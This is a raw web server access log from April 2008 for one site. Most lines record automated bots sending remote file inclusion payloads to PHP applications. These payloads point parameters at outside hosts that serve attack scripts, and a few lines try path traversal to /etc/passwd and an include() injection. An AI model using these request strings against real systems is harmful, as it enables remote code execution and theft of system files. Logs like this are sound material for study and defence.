66.7.198.112 - - [07/Apr/2008:09:15:03 -0700] "GET /logs//language/lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:09:15:30 -0700] "GET /index.php?id=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.199.201 - - [07/Apr/2008:09:15:41 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.welshit.co.uk/livehelp/txt-db-api/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
72.32.199.201 - - [07/Apr/2008:09:15:42 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.welshit.co.uk/livehelp/txt-db-api/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:16:28 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:16:29 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:16:30 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:16:36 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:16:37 -0700] "GET //?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:16:38 -0700] "GET /logs//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.211.55 - - [07/Apr/2008:09:16:56 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:17:07 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:17:07 -0700] "GET /main.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:17:08 -0700] "GET /logs/access_080226.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:17:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:17:55 -0700] "HEAD /logs/access_080127.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
62.146.4.147 - - [07/Apr/2008:09:18:01 -0700] "GET /convert/mvcw.php?vwar_root=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:03 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:04 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:04 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:08 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:09:18:08 -0700] "GET //language/lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:08 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:18:08 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.146.4.147 - - [07/Apr/2008:09:18:16 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [07/Apr/2008:09:18:20 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:18:39 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:18:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:18:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:18:46 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:18:56 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:18:57 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:18:58 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:18:58 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:18:59 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:18:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:18:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:18:59 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:19:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:19:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:19:02 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:19:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:19:02 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:19:46 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:20:17 -0700] "GET /logs/ HTTP/1.1" 200 42122 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:20:49 -0700] "GET /logs/access_080312.log/[Scripthttp://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:20:59 -0700] "HEAD /logs/access_080108.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
89.106.71.5 - - [07/Apr/2008:09:21:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aceperform.110mb.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.106.71.5 - - [07/Apr/2008:09:21:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://aceperform.110mb.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:21:38 -0700] "GET /logs/access_070706.log HTTP/1.0" 200 26632 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:21:38 -0700] "GET /logs/?D=A HTTP/1.0" 200 42106 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.119 - - [07/Apr/2008:09:21:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.98 - - [07/Apr/2008:09:21:39 -0700] "GET /logs/access_080321.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:21:46 -0700] "GET /logs/access_080319.log HTTP/1.0" 200 1471726 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.66.74.50 - - [07/Apr/2008:09:22:23 -0700] "GET /logs/access_080207.log/appserv/main.php?appserv_root=http://masherry.athost.net/cek/ech.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.66.74.50 - - [07/Apr/2008:09:22:23 -0700] "GET /logs/appserv/main.php?appserv_root=http://masherry.athost.net/cek/ech.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:22:28 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:09:22:44 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:09:22:44 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:09:22:44 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:09:22:57 -0700] "GET /logs/access_080223.log/index2.php?page=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:23:01 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:23:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:09:23:01 -0700] "GET /index2.php?page=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:09:23:02 -0700] "GET /logs/index2.php?page=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:23:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.74.50 - - [07/Apr/2008:09:23:26 -0700] "GET /logs/access_080313.log/appserv/main.php?appserv_root=http://masherry.athost.net/cek/ech.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:05 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:05 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:06 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:17 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:18 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:24:19 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:24:28 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.165.40 - - [07/Apr/2008:09:24:37 -0700] "GET /logs/access_080117.log//skin/zero_vote/error.php?dir=http://www.hairbyerin.net/TotalCalendar_2.4/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [07/Apr/2008:09:24:38 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hairbyerin.net/TotalCalendar_2.4/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [07/Apr/2008:09:24:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hairbyerin.net/TotalCalendar_2.4/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:24:40 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:24:40 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:24:40 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:24:41 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:09:24:50 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:24:55 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:24:56 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:09:24:56 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:24:59 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.151.18 - - [07/Apr/2008:09:25:02 -0700] "GET /logs//administrator/?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
75.125.151.18 - - [07/Apr/2008:09:25:07 -0700] "GET //administrator/?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:25:29 -0700] "HEAD /logs/access_080123.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:29 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:30 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:30 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:09:25:31 -0700] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:31 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:31 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:32 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:25:32 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:25:38 -0700] "HEAD /logs/access_080201.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:42 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:43 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:43 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:44 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:44 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:25:44 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:25:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:26:03 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:09:26:06 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:26:17 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:26:35 -0700] "GET /logs/access_080225.log//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:26:38 -0700] "GET //?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:26:39 -0700] "GET /logs//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:26:45 -0700] "GET /?D=A HTTP/1.1" 200 7371 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:27:01 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:27:02 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:27:02 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
